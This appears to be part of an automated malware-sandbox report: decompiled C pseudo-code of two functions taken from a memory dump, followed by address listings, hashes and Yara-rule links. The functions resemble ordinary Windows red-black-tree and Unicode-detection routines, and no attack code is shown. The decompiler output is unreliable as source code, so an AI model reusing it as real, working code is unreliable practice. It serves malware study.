Download Yara Rule

C-Code - Quality: 99%

			E019FB090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
													_t126 = _t126 ^ _t178;
												}
											}
											if(_t126 != _t182) {
												goto L83;
											} else {
												_t126 =  *(_t211 + _v8 * 4);
												if(_t167 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t211;
													}
												}
												if(_t126 != _t178) {
													goto L83;
												} else {
													_t77 = _t178 + 8; // 0x8
													_t150 = _t77;
													_v20 = _t150;
													_t126 =  *_t150 & 0xfffffffc;
													if(_t167 != 0) {
														if(_t126 != 0) {
															_t126 = _t126 ^ _t178;
														}
													}
													if(_t126 != _t211) {
														goto L83;
													} else {
														_t202 = _t211 ^ _t182;
														_t152 = _t202;
														if(_t167 == 0) {
															_t152 = _t182;
														}
														 *(_t211 + _v8 * 4) = _t152;
														_t170 = _v12;
														if(_t170 == 0) {
															_t202 = _t211;
														}
														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
														_t126 =  *(_t182 + _v8 * 4);
														if(_t170 != 0) {
															if(_t126 == 0) {
																L58:
																if(_t170 != 0) {
																	if(_t126 != 0) {
																		_t126 = _t126 ^ _t178;
																	}
																}
																 *(_t178 + _v16 * 4) = _t126;
																_t199 = _t178 ^ _t182;
																if(_t170 != 0) {
																	_t178 = _t199;
																}
																 *(_t182 + _v8 * 4) = _t178;
																if(_t170 == 0) {
																	_t199 = _t182;
																}
																 *_v20 =  *_v20 & 0x00000003 | _t199;
																_t178 = _t182;
																_t167 =  *((intOrPtr*)(_a4 + 4));
																goto L21;
															}
															_t126 = _t126 ^ _t182;
														}
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t194 = _t167 & 0xfffffffc;
															if(_v12 != 0) {
																L84:
																if(_t194 != 0) {
																	_t194 = _t194 ^ _t126;
																}
															}
															if(_t194 != _t182) {
																goto L83;
															}
															if(_v12 != 0) {
																_t196 = _t126 ^ _t178;
															} else {
																_t196 = _t178;
															}
															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
															_t170 = _v12;
														}
														goto L58;
													}
												}
											}
										}
									}
									L21:
									_t182 = _v8 ^ 0x00000001;
									_t126 =  *(_t178 + 8) & 0xfffffffc;
									_v8 = _t182;
									_t194 = _t167 & 1;
									if(_t194 != 0) {
										if(_t126 != 0) {
											_t126 = _t126 ^ _t178;
										}
									}
									if(_t126 != _t211) {
										goto L83;
									} else {
										_t134 = _t182 ^ 0x00000001;
										_v16 = _t134;
										_t126 =  *(_t211 + _t134 * 4);
										if(_t194 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t211;
											}
										}
										if(_t126 != _t178) {
											goto L83;
										} else {
											_t167 = _t211 + 8;
											_t182 =  *_t167 & 0xfffffffc;
											_v20 = _t167;
											if(_t194 != 0) {
												if(_t182 == 0) {
													L80:
													_t126 = _a4;
													if( *_t126 != _t211) {
														goto L83;
													}
													 *_t126 = _t178;
													L34:
													if(_t194 != 0) {
														if(_t182 != 0) {
															_t182 = _t182 ^ _t178;
														}
													}
													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
													if(_t194 != 0) {
														if(_t139 == 0) {
															goto L37;
														}
														_t126 = _t139 ^ _t178;
														goto L36;
													} else {
														L36:
														if(_t126 != 0) {
															_t167 =  *(_t126 + 8);
															_t182 = _t167 & 0xfffffffc;
															if(_t194 != 0) {
																if(_t182 != 0) {
																	_t182 = _t182 ^ _t126;
																}
															}
															if(_t182 != _t178) {
																goto L83;
															} else {
																if(_t194 != 0) {
																	_t190 = _t126 ^ _t211;
																} else {
																	_t190 = _t211;
																}
																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
																_t167 = _v20;
																goto L37;
															}
														}
														L37:
														if(_t194 != 0) {
															if(_t139 != 0) {
																_t139 = _t139 ^ _t211;
															}
														}
														 *(_t211 + _v16 * 4) = _t139;
														_t187 = _t211 ^ _t178;
														if(_t194 != 0) {
															_t211 = _t187;
														}
														 *(_t178 + _v8 * 4) = _t211;
														if(_t194 == 0) {
															_t187 = _t178;
														}
														_t143 =  *_t167 & 0x00000003 | _t187;
														 *_t167 = _t143;
														_t117 = _t143 | 0x00000001;
														 *_t167 = _t117;
														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
														goto L42;
													}
												}
												_t182 = _t182 ^ _t211;
											}
											if(_t182 == 0) {
												goto L80;
											}
											_t144 =  *(_t182 + 4);
											if(_t194 != 0) {
												if(_t144 != 0) {
													_t144 = _t144 ^ _t182;
												}
											}
											if(_t144 == _t211) {
												if(_t194 != 0) {
													_t146 = _t182 ^ _t178;
												} else {
													_t146 = _t178;
												}
												 *(_t182 + 4) = _t146;
												goto L34;
											} else {
												_t126 =  *_t182;
												if(_t194 != 0) {
													if(_t126 != 0) {
														_t126 = _t126 ^ _t182;
													}
												}
												if(_t126 != _t211) {
													goto L83;
												} else {
													if(_t194 != 0) {
														_t148 = _t182 ^ _t178;
													} else {
														_t148 = _t178;
													}
													 *_t182 = _t148;
													goto L34;
												}
											}
										}
									}
								} else {
									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
									_t182 = _t211;
									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
									_t174 = _a4;
									_t117 =  *(_t211 + 8);
									_t181 = _t117 & 0xfffffffc;
									if(( *(_t174 + 4) & 0x00000001) != 0) {
										if(_t181 == 0) {
											goto L42;
										}
										_t178 = _t181 ^ _t211;
									}
									if(_t178 == 0) {
										goto L42;
									}
									goto L17;
								}
							}
							L17:
							 *(_t211 + 8) = _t117 | 0x00000001;
							_t40 = _t174 + 4; // 0x4
							_t117 =  *_t178;
							_t165 =  *_t40 & 0x00000001;
							if(_t165 != 0) {
								if(_t117 != 0) {
									_t117 = _t117 ^ _t178;
								}
							}
							_a12 = _t211 != _t117;
						} while (( *(_t178 + 8) & 0x00000001) != 0);
						goto L42;
					}
				}
			}

0x019fb095
0x019fb09b
0x019fb09f
0x019fb0a5
0x019fb0a7
0x019fb0aa
0x019fb0ad
0x019fb0b1
0x019fb3f8
0x019fb3fa
0x019fb3ff
0x019fb419
0x019fb41b
0x019fb41b
0x019fb401
0x00000000
0x019fb0b7
0x019fb0b9
0x019fb0bc
0x019fb0c0
0x019fb0c2
0x019fb0c2
0x019fb0c4
0x019fb0c8
0x019fb0cf
0x019fb0d1
0x019fb0d1
0x019fb0da
0x019fb0dd
0x019fb0df
0x019fb0df
0x019fb0e4
0x019fb0e9
0x019fb3e2
0x019fb3e5
0x019fb3eb
0x01a4a676
0x01a4a67b
0x01a4a67d
0x019fb3f1
0x019fb3f1
0x019fb3f1
0x019fb0ef
0x019fb0ef
0x019fb0ef
0x019fb0e9
0x019fb0f6
0x019fb28d
0x019fb28e
0x019fb293
0x019fb0fc
0x019fb0fc
0x019fb101
0x019fb104
0x019fb107
0x019fb10c
0x01a4a687
0x01a4a68d
0x01a4a68d
0x01a4a687
0x019fb112
0x019fb116
0x01a4a696
0x01a4a69c
0x01a4a69c
0x01a4a696
0x019fb120
0x019fb121
0x019fb124
0x019fb127
0x019fb12a
0x019fb12d
0x019fb132
0x01a4a6a5
0x00000000
0x00000000
0x01a4a6ab
0x00000000
0x019fb138
0x019fb138
0x019fb13a
0x019fb193
0x019fb197
0x019fb19d
0x019fb29c
0x019fb29f
0x019fb2a2
0x019fb2a7
0x01a4a6d2
0x01a4a6d8
0x01a4a6d8
0x01a4a6d2
0x019fb2af
0x019fb420
0x019fb422
0x019fb423
0x00000000
0x019fb2b5
0x019fb2b5
0x019fb2ba
0x01a4a6e1
0x01a4a6e7
0x01a4a6e7
0x01a4a6e1
0x019fb2c2
0x00000000
0x019fb2c8
0x019fb2cb
0x019fb2d0
0x01a4a6f0
0x01a4a6f6
0x01a4a6f6
0x01a4a6f0
0x019fb2d8
0x00000000
0x019fb2de
0x019fb2de
0x019fb2de
0x019fb2e1
0x019fb2e6
0x019fb2eb
0x01a4a6ff
0x01a4a705
0x01a4a705
0x01a4a6ff
0x019fb2f3
0x00000000
0x019fb2f9
0x019fb2fb
0x019fb2fd
0x019fb301
0x019fb303
0x019fb303
0x019fb308
0x019fb30b
0x019fb310
0x019fb312
0x019fb312
0x019fb31c
0x019fb322
0x019fb327
0x01a4a70e
0x019fb335
0x019fb337
0x01a4a71d
0x01a4a723
0x01a4a723
0x01a4a71d
0x019fb340
0x019fb345
0x019fb349
0x01a4a72a
0x01a4a72a
0x019fb352
0x019fb357
0x019fb359
0x019fb359
0x019fb365
0x019fb367
0x019fb36c
0x00000000
0x019fb36c
0x01a4a714
0x01a4a714
0x019fb32f
0x019fb3b8
0x019fb3bd
0x019fb3c4
0x019fb425
0x019fb427
0x019fb429
0x019fb429
0x019fb427
0x019fb3c8
0x00000000
0x00000000
0x019fb3ce
0x019fb42f
0x019fb3d0
0x019fb3d0
0x019fb3d0
0x019fb3d7
0x019fb3da
0x019fb3da
0x00000000
0x019fb32f
0x019fb2f3
0x019fb2d8
0x019fb2c2
0x019fb2af
0x019fb1a3
0x019fb1a9
0x019fb1af
0x019fb1b2
0x019fb1b5
0x019fb1b8
0x01a4a733
0x01a4a739
0x01a4a739
0x01a4a733
0x019fb1c0
0x00000000
0x019fb1c6
0x019fb1c8
0x019fb1cb
0x019fb1ce
0x019fb1d3
0x01a4a742
0x01a4a748
0x01a4a748
0x01a4a742
0x019fb1db
0x00000000
0x019fb1e1
0x019fb1e1
0x019fb1e6
0x019fb1e9
0x019fb1ee
0x01a4a751
0x019fb409
0x019fb409
0x019fb40e
0x00000000
0x00000000
0x019fb410
0x019fb22d
0x019fb22f
0x01a4a790
0x01a4a796
0x01a4a796
0x01a4a790
0x019fb23d
0x019fb243
0x019fb248
0x01a4a79f
0x00000000
0x00000000
0x01a4a7a5
0x00000000
0x019fb24e
0x019fb24e
0x019fb250
0x019fb374
0x019fb379
0x019fb37e
0x01a4a7ae
0x01a4a7b4
0x01a4a7b4
0x01a4a7ae
0x019fb386
0x00000000
0x019fb38c
0x019fb38e
0x01a4a7bd
0x019fb394
0x019fb394
0x019fb394
0x019fb39b
0x019fb39e
0x00000000
0x019fb39e
0x019fb386
0x019fb256
0x019fb258
0x01a4a7c6
0x01a4a7cc
0x01a4a7cc
0x01a4a7c6
0x019fb261
0x019fb266
0x019fb26a
0x01a4a7d3
0x01a4a7d3
0x019fb273
0x019fb278
0x019fb27a
0x019fb27a
0x019fb281
0x019fb283
0x019fb285
0x019fb287
0x019fb289
0x00000000
0x019fb289
0x019fb248
0x01a4a757
0x01a4a757
0x019fb1f6
0x00000000
0x00000000
0x019fb1fc
0x019fb201
0x01a4a760
0x01a4a766
0x01a4a766
0x01a4a760
0x019fb209
0x019fb3a8
0x01a4a76f
0x019fb3ae
0x019fb3ae
0x019fb3ae
0x019fb3b0
0x00000000
0x019fb20f
0x019fb20f
0x019fb213
0x01a4a778
0x01a4a77e
0x01a4a77e
0x01a4a778
0x019fb21b
0x00000000
0x019fb221
0x019fb223
0x01a4a787
0x019fb229
0x019fb229
0x019fb229
0x019fb22b
0x00000000
0x019fb22b
0x019fb21b
0x019fb209
0x019fb1db
0x019fb142
0x019fb142
0x019fb146
0x019fb148
0x019fb14c
0x019fb14f
0x019fb154
0x019fb15b
0x01a4a6b4
0x00000000
0x00000000
0x01a4a6ba
0x01a4a6ba
0x019fb163
0x00000000
0x00000000
0x00000000
0x019fb163
0x019fb13a
0x019fb169
0x019fb16b
0x019fb16e
0x019fb171
0x019fb175
0x019fb178
0x01a4a6c3
0x01a4a6c9
0x01a4a6c9
0x01a4a6c3
0x019fb180
0x019fb184
0x00000000
0x019fb104
0x019fb0f6

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction ID: 1e007cc8303079992aaf65cb276b8fc82a3bfe5d68f7b68500e1715d33937067
Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
Instruction Fuzzy Hash: 6ED11535744216ABDB22CE2CC98076ABBE9AF84355B28856CDE6FCB342E771D8418750

Uniqueness

Uniqueness Score: -1.00%

Function 019E0D20, Relevance: .4, Instructions: 372
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E019E0D20(signed short* _a4, signed char _a8, unsigned int _a12) {
				signed char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				signed char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _t159;
				unsigned int _t160;
				signed int _t162;
				unsigned int _t163;
				signed int _t180;
				signed int _t192;
				signed int _t193;
				unsigned int _t194;
				signed char _t196;
				signed int _t197;
				signed char _t198;
				signed char _t199;
				unsigned int _t200;
				unsigned int _t202;
				unsigned int _t204;
				unsigned int _t205;
				unsigned int _t209;
				signed int _t210;
				signed int _t211;
				unsigned int _t212;
				signed char _t213;
				signed short* _t214;
				intOrPtr _t215;
				signed int _t216;
				signed int _t217;
				unsigned int _t218;
				signed int _t220;
				signed int _t221;
				signed short _t223;
				signed char _t224;
				signed int _t229;
				signed int _t231;
				unsigned int _t233;
				unsigned int _t237;
				signed int _t238;
				unsigned int _t239;
				signed int _t240;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				unsigned int _t258;
				void* _t261;

				_t213 = _a8;
				_t159 = 0;
				_v60 = 0;
				_t237 = _t213 >> 1;
				_t210 = 0;
				_t257 = 0;
				_v56 = 0;
				_v52 = 0;
				_v44 = 0;
				_v48 = 0;
				_v92 = 0;
				_v88 = 0;
				_v76 = 0;
				_v72 = 0;
				_v64 = 0;
				_v68 = 0;
				_v24 = 0;
				_v80 = 0;
				_v84 = 0;
				_v28 = 0;
				_v32 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v100 = _t237;
				if(_t237 > 0x100) {
					_t254 = 0x100;
					_v36 = 0x100;
					L2:
					_t261 = _t213 - 2;
					if(_t261 == 0) {
						_t214 = _a4;
						_t160 =  *_t214 & 0x0000ffff;
						__eflags = _t160;
						if(_t160 == 0) {
							L108:
							_t159 = 0;
							L8:
							_t238 = 0;
							_v96 = 0;
							if(_t254 == 0) {
								L30:
								_v24 = _t159 - 1;
								goto L31;
							} else {
								goto L11;
								L13:
								_t224 = _t223 >> 8;
								_v40 = _t224;
								_t256 = _t224 & 0x000000ff;
								_t196 = _a4[_t238];
								_v5 = _t196;
								_t197 = _t196 & 0x000000ff;
								if(_t197 == 0xd) {
									__eflags = _t257 - 0xa;
									if(_t257 == 0xa) {
										_v12 = _v12 + 1;
									}
								} else {
									if(_t197 == 0xa) {
										__eflags = _t257 - 0xd;
										if(_t257 == 0xd) {
											_v12 = _v12 + 1;
										}
									}
								}
								_v24 = (0 | _t256 == 0x00000000) + _v24 + (0 | _t197 == 0x00000000);
								if(_t256 > _t257) {
									_t229 = _t256;
								} else {
									_t229 = _t257;
								}
								if(_t257 >= _t256) {
									_t257 = _t256;
								}
								_v28 = _v28 + _t229 - _t257;
								_t231 = _t197;
								if(_t197 <= _t210) {
									_t231 = _t210;
								}
								if(_t210 >= _t197) {
									_t210 = _t197;
								}
								_v32 = _v32 + _t231 - _t210;
								_t238 = _v96 + 1;
								_t210 = _t197;
								_t257 = _t256;
								_v96 = _t238;
								if(_t238 < _v36) {
									_t214 = _a4;
									L11:
									_t223 = _t214[_t238] & 0x0000ffff;
									_t193 = _t223 & 0x0000ffff;
									if(_t193 >= 0x900 || _t193 < 0x21) {
										goto L58;
									} else {
										goto L13;
									}
								}
								_t198 = _v5;
								if(_t198 == 0xd) {
									_t199 = _v40;
									__eflags = _t199 - 0xa;
									if(_t199 != 0xa) {
										L27:
										_t233 = _v12;
										L28:
										if(_t199 != 0) {
											__eflags = _t199 - 0x1a;
											if(_t199 == 0x1a) {
												_v12 = _t233 + 1;
											}
											L31:
											_t162 = _a8;
											if(_t162 > 0x200) {
												_t255 = 0x200;
											} else {
												_t255 = _t162;
											}
											_t215 =  *0x1ad6d59; // 0x0
											if(_t215 != 0) {
												_t239 = 0;
												__eflags = _t255;
												if(_t255 == 0) {
													goto L34;
												} else {
													goto L119;
												}
												do {
													L119:
													_t192 =  *(_a4 + _t239) & 0x000000ff;
													__eflags =  *((short*)(0x1ad6920 + _t192 * 2));
													_t163 = _v20;
													if( *((short*)(0x1ad6920 + _t192 * 2)) != 0) {
														_t163 = _t163 + 1;
														_t239 = _t239 + 1;
														__eflags = _t239;
														_v20 = _t163;
													}
													_t239 = _t239 + 1;
													__eflags = _t239 - _t255;
												} while (_t239 < _t255);
												goto L35;
											} else {
												L34:
												_t163 = 0;
												L35:
												_t240 = _v32;
												_t211 = _v28;
												if(_t240 < 0x7f) {
													__eflags = _t211;
													if(_t211 != 0) {
														L37:
														if(_t240 == 0) {
															_v16 = 0x10;
														}
														L38:
														_t258 = _a12;
														if(_t215 != 0) {
															__eflags = _t163;
															if(_t163 == 0) {
																goto L39;
															}
															__eflags = _t258;
															if(_t258 == 0) {
																goto L39;
															}
															__eflags =  *_t258 & 0x00000400;
															if(( *_t258 & 0x00000400) == 0) {
																goto L39;
															}
															_t218 = _v100;
															__eflags = _t218 - 0x100;
															if(_t218 > 0x100) {
																_t218 = 0x100;
															}
															_t220 = (_t218 >> 1) - 1;
															__eflags = _v20 - 0xaaaaaaab * _t220 >> 0x20 >> 1;
															if(_v20 >= 0xaaaaaaab * _t220 >> 0x20 >> 1) {
																_t221 = _t220 + _t220;
																__eflags = _v20 - 0xaaaaaaab * _t221 >> 0x20 >> 1;
																asm("sbb ecx, ecx");
																_t216 =  ~_t221 + 1;
																__eflags = _t216;
															} else {
																_t216 = 3;
															}
															_v16 = _v16 | 0x00000400;
															_t240 = _v32;
															L40:
															if(_t211 * _t216 < _t240) {
																_v16 = _v16 | 0x00000002;
															}
															_t217 = _v16;
															if(_t240 * _t216 < _t211) {
																_t217 = _t217 | 0x00000020;
															}
															if(_v44 + _v48 + _v52 + _v56 + _v60 != 0) {
																_t217 = _t217 | 0x00000004;
															}
															if(_v64 + _v68 + _v72 + _v76 != 0) {
																_t217 = _t217 | 0x00000040;
															}
															if(_v80 + _v84 + _v88 + _v92 == 0) {
																_t212 = _v12;
																__eflags = _t212;
																if(_t212 == 0) {
																	goto L48;
																}
																__eflags = _t212 - 0xcccccccd * _t255 >> 0x20 >> 5;
																if(_t212 >= 0xcccccccd * _t255 >> 0x20 >> 5) {
																	goto L47;
																}
																goto L48;
															} else {
																L47:
																_t217 = _t217 | 0x00000100;
																L48:
																if((_a8 & 0x00000001) != 0) {
																	_t217 = _t217 | 0x00000200;
																}
																if(_v24 != 0) {
																	_t217 = _t217 | 0x00001000;
																}
																_t180 =  *_a4 & 0x0000ffff;
																if(_t180 != 0xfeff) {
																	__eflags = _t180 - 0xfffe;
																	if(_t180 == 0xfffe) {
																		_t217 = _t217 | 0x00000080;
																	}
																} else {
																	_t217 = _t217 | 0x00000008;
																}
																if(_t258 != 0) {
																	 *_t258 =  *_t258 & _t217;
																	_t217 =  *_t258;
																}
																if((_t217 & 0x00000b08) != 8) {
																	__eflags = _t217 & 0x000000f0;
																	if((_t217 & 0x000000f0) != 0) {
																		L84:
																		return 0;
																	}
																	__eflags = _t217 & 0x00000f00;
																	if((_t217 & 0x00000f00) == 0) {
																		__eflags = _t217 & 0x0000f00f;
																		if((_t217 & 0x0000f00f) == 0) {
																			goto L84;
																		}
																		goto L56;
																	}
																	goto L84;
																} else {
																	L56:
																	return 1;
																}
															}
														}
														L39:
														_t216 = 3;
														goto L40;
													}
													_v16 = 1;
													goto L38;
												}
												if(_t211 == 0) {
													goto L38;
												}
												goto L37;
											}
										} else {
											_t159 = _v24;
											goto L30;
										}
									}
									L104:
									_t233 = _v12 + 1;
									_v12 = _t233;
									goto L28;
								}
								_t199 = _v40;
								if(_t198 != 0xa || _t199 != 0xd) {
									goto L27;
								} else {
									goto L104;
								}
								L58:
								__eflags = _t193 - 0x3001;
								if(_t193 < 0x3001) {
									L60:
									__eflags = _t193 - 0xd00;
									if(__eflags > 0) {
										__eflags = _t193 - 0x3000;
										if(__eflags > 0) {
											_t194 = _t193 - 0xfeff;
											__eflags = _t194;
											if(_t194 != 0) {
												_t200 = _t194 - 0xff;
												__eflags = _t200;
												if(_t200 == 0) {
													_v88 = _v88 + 1;
												} else {
													__eflags = _t200 == 1;
													if(_t200 == 1) {
														_v92 = _v92 + 1;
													}
												}
											}
										} else {
											if(__eflags == 0) {
												_v48 = _v48 + 1;
											} else {
												_t202 = _t193 - 0x2000;
												__eflags = _t202;
												if(_t202 == 0) {
													_v68 = _v68 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v76 = _v76 + 1;
										goto L13;
									}
									__eflags = _t193 - 0x20;
									if(__eflags > 0) {
										_t204 = _t193 - 0x900;
										__eflags = _t204;
										if(_t204 == 0) {
											_v64 = _v64 + 1;
										} else {
											_t205 = _t204 - 0x100;
											__eflags = _t205;
											if(_t205 == 0) {
												_v72 = _v72 + 1;
											} else {
												__eflags = _t205 == 0xd;
												if(_t205 == 0xd) {
													_v84 = _v84 + 1;
												}
											}
										}
										goto L13;
									}
									if(__eflags == 0) {
										_v44 = _v44 + 1;
										goto L13;
									}
									__eflags = _t193 - 0xd;
									if(_t193 > 0xd) {
										goto L13;
									}
									_t84 = _t193 + 0x19e1174; // 0x4040400
									switch( *((intOrPtr*)(( *_t84 & 0x000000ff) * 4 +  &M019E1160))) {
										case 0:
											_v80 = _v80 + 1;
											goto L13;
										case 1:
											_v52 = _v52 + 1;
											goto L13;
										case 2:
											_v56 = _v56 + 1;
											goto L13;
										case 3:
											_v60 = _v60 + 1;
											goto L13;
										case 4:
											goto L13;
									}
								}
								__eflags = _t193 - 0xfeff;
								if(_t193 < 0xfeff) {
									goto L13;
								}
								goto L60;
							}
						}
						__eflags = _t160 >> 8;
						if(_t160 >> 8 == 0) {
							L101:
							_t209 = _a12;
							__eflags = _t209;
							if(_t209 != 0) {
								 *_t209 = 5;
							}
							goto L84;
						}
						goto L108;
					}
					if(_t261 <= 0 || _t237 > 0x100) {
						_t214 = _a4;
					} else {
						_t214 = _a4;
						if((_t213 & 0x00000001) == 0 && ( *(_t214 + _t254 * 2 - 2) & 0x0000ff00) == 0) {
							_t254 = _t254 - 1;
							_v36 = _t254;
						}
					}
					goto L8;
				}
				_t254 = _t237;
				_v36 = _t254;
				if(_t254 == 0) {
					goto L101;
				}
				goto L2;
			}

0x019e0d2b
0x019e0d2e
0x019e0d32
0x019e0d39
0x019e0d3b
0x019e0d3d
0x019e0d3f
0x019e0d46
0x019e0d4d
0x019e0d54
0x019e0d5b
0x019e0d62
0x019e0d69
0x019e0d70
0x019e0d77
0x019e0d7e
0x019e0d85
0x019e0d88
0x019e0d8b
0x019e0d8e
0x019e0d91
0x019e0d94
0x019e0d97
0x019e0d9a
0x019e0d9d
0x019e0da6
0x019e10e9
0x019e10ee
0x019e0db9
0x019e0db9
0x019e0dbc
0x01a3e9c7
0x01a3e9ca
0x01a3e9cd
0x01a3e9d0
0x01a3e9dd
0x01a3e9dd
0x019e0dec
0x019e0dec
0x019e0dee
0x019e0df3
0x019e0ebf
0x019e0ec0
0x00000000
0x019e0df9
0x019e0df9
0x019e0e1e
0x019e0e21
0x019e0e24
0x019e0e27
0x019e0e2a
0x019e0e2d
0x019e0e30
0x019e0e36
0x019e1040
0x019e1043
0x019e1049
0x019e1049
0x019e0e3c
0x019e0e3f
0x019e1007
0x019e100a
0x019e1010
0x019e1010
0x019e100a
0x019e0e3f
0x019e0e58
0x019e0e5d
0x019e1000
0x019e0e63
0x019e0e63
0x019e0e63
0x019e0e67
0x019e0e69
0x019e0e69
0x019e0e6d
0x019e0e70
0x019e0e74
0x019e0e76
0x019e0e76
0x019e0e7a
0x019e0e7c
0x019e0e7c
0x019e0e83
0x019e0e86
0x019e0e87
0x019e0e89
0x019e0e8b
0x019e0e91
0x019e0e00
0x019e0e03
0x019e0e03
0x019e0e07
0x019e0e0f
0x00000000
0x00000000
0x00000000
0x00000000
0x019e0e0f
0x019e0e97
0x019e0e9c
0x019e113e
0x019e1141
0x019e1143
0x019e0eb1
0x019e0eb1
0x019e0eb4
0x019e0eb6
0x019e1110
0x019e1112
0x01a3ea25
0x01a3ea25
0x019e0ec3
0x019e0ec3
0x019e0ecb
0x019e10fe
0x019e0ed1
0x019e0ed1
0x019e0ed1
0x019e0ed3
0x019e0edb
0x01a3ea2d
0x01a3ea2f
0x01a3ea31
0x00000000
0x00000000
0x00000000
0x00000000
0x01a3ea37
0x01a3ea37
0x01a3ea3a
0x01a3ea3e
0x01a3ea47
0x01a3ea4a
0x01a3ea4c
0x01a3ea4d
0x01a3ea4d
0x01a3ea4e
0x01a3ea4e
0x01a3ea51
0x01a3ea52
0x01a3ea52
0x00000000
0x019e0ee1
0x019e0ee1
0x019e0ee1
0x019e0ee3
0x019e0ee3
0x019e0ee6
0x019e0eec
0x01a3ea5b
0x01a3ea5d
0x019e0ef6
0x019e0ef8
0x01a3ea6f
0x01a3ea6f
0x019e0efe
0x019e0efe
0x019e0f03
0x01a3ea7b
0x01a3ea7d
0x00000000
0x00000000
0x01a3ea83
0x01a3ea85
0x00000000
0x00000000
0x01a3ea8b
0x01a3ea91
0x00000000
0x00000000
0x01a3ea97
0x01a3ea9a
0x01a3eaa0
0x01a3eaa2
0x01a3eaa2
0x01a3eaae
0x01a3eab3
0x01a3eab6
0x01a3eabf
0x01a3eaca
0x01a3eacd
0x01a3ead1
0x01a3ead1
0x01a3eab8
0x01a3eab8
0x01a3eab8
0x01a3ead2
0x01a3ead9
0x019e0f0e
0x019e0f15
0x019e0f17
0x019e0f17
0x019e0f1e
0x019e0f23
0x01a3eae1
0x01a3eae1
0x019e0f38
0x019e0f3a
0x019e0f3a
0x019e0f49
0x019e1108
0x019e1108
0x019e0f5b
0x019e10c7
